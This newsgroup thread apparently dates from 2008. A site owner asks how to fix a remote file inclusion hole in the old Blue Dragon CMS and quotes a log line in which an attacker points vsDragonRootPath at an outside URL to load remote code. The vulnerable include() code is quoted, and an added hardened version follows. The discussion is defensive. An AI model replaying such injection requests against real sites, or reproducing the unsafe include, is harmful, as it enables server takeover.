Posted by Rik Wasmus on 02/02/08 12:00
On Sat, 02 Feb 2008 12:47:09 +0100, salonowiec <debrza_remove@poczta.onet.pl> wrote:
> My admin notified me that my site is closed till the error is removed. My
> CMS is PHPBlue Dragon (pretty old). The attack was like this (found in
> logs):
>
> d198-53-20-215.abhsia.telus.net kurpiel.pl - [01/Feb/2008:19:44:06 +0100] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://pcbcservice.com/all.txt? HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
>
>
>
> The above mentioned activecontent.php is:
>
> <?php
> /***************************************************************************
> * Blue Dragon CMS Platinum
> * ------------------------------------
> *
> * script file id : activecontent.php
> * begin platinum : 2004/03/01
> * copyright : (C) 2003 Apache
> *
> * file platinum ver : 1.0
> *
> * This source file is part of the "Blue Dragon CMS Platinum" (Content
> * Management System).
> *
> * This file may be distributed and/or modified under the terms of the
> * "Blue Dragon CMS Platinum License" version 2 as published by the
> * software author.
> *
> * This file is provided AS IS with NO WARRANTY!
> **************************************************************************/
>
> include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$phpExt);?>
>
> Can I - rather ignorant in php - modify the file to make it
> hacker-resistant? Many thanks
Register globals should be off....

And I started to type a whole story, then, for some reason, I decided to
Google this 'Blue Dragon CMS'. Here you go, one of the first hits:
<http://securitydot.net/xpl/exploits/vulnerabilities/articles/909/exploit.html>

Personally, any CMS with this kind of vulnerability, AND relying on
register_globals, has instantly lost all my trust.
-- 
Rik Wasmus
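
A hardened form of the quoted activecontent.php, as an added example that is not part of the original thread and is not Blue Dragon CMS code. It assumes the file sits two directories below the CMS root (as the request path in the log suggests) and that included files use the .php extension.

```php
<?php
// Added example, not Blue Dragon CMS code: a hardened activecontent.php.
// Assumptions: this file lives in <cms root>/public_includes/pub_blocks/
// (taken from the request path in the log) and included files end in ".php".

// With register_globals on, ?vsDragonRootPath=... in the URL becomes the
// variable $vsDragonRootPath. Reject any request that tries to supply
// either variable used in the include path.
foreach (array('vsDragonRootPath', 'phpExt') as $name) {
    if (isset($_GET[$name]) || isset($_POST[$name]) || isset($_COOKIE[$name])) {
        header('HTTP/1.1 403 Forbidden');
        exit('Forbidden');
    }
}

// Build the include path from this file's own location on disk instead of
// from a variable that the request can set.
$vsDragonRootPath = dirname(dirname(dirname(__FILE__))) . '/';
$phpExt = 'php';

$root   = realpath($vsDragonRootPath);
$target = realpath($vsDragonRootPath . 'public_includes/pub_moddata/activefile.' . $phpExt);

// realpath() returns false for missing files and for URLs; the prefix check
// keeps the include inside the CMS directory.
if ($root === false || $target === false
    || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Include target not found');
}

include $target;
```

At the server level, `register_globals = Off` and `allow_url_include = Off` (PHP 5.2 and later) in php.ini stop request parameters from becoming variables and stop `include` from fetching URLs, which covers every script rather than only this one.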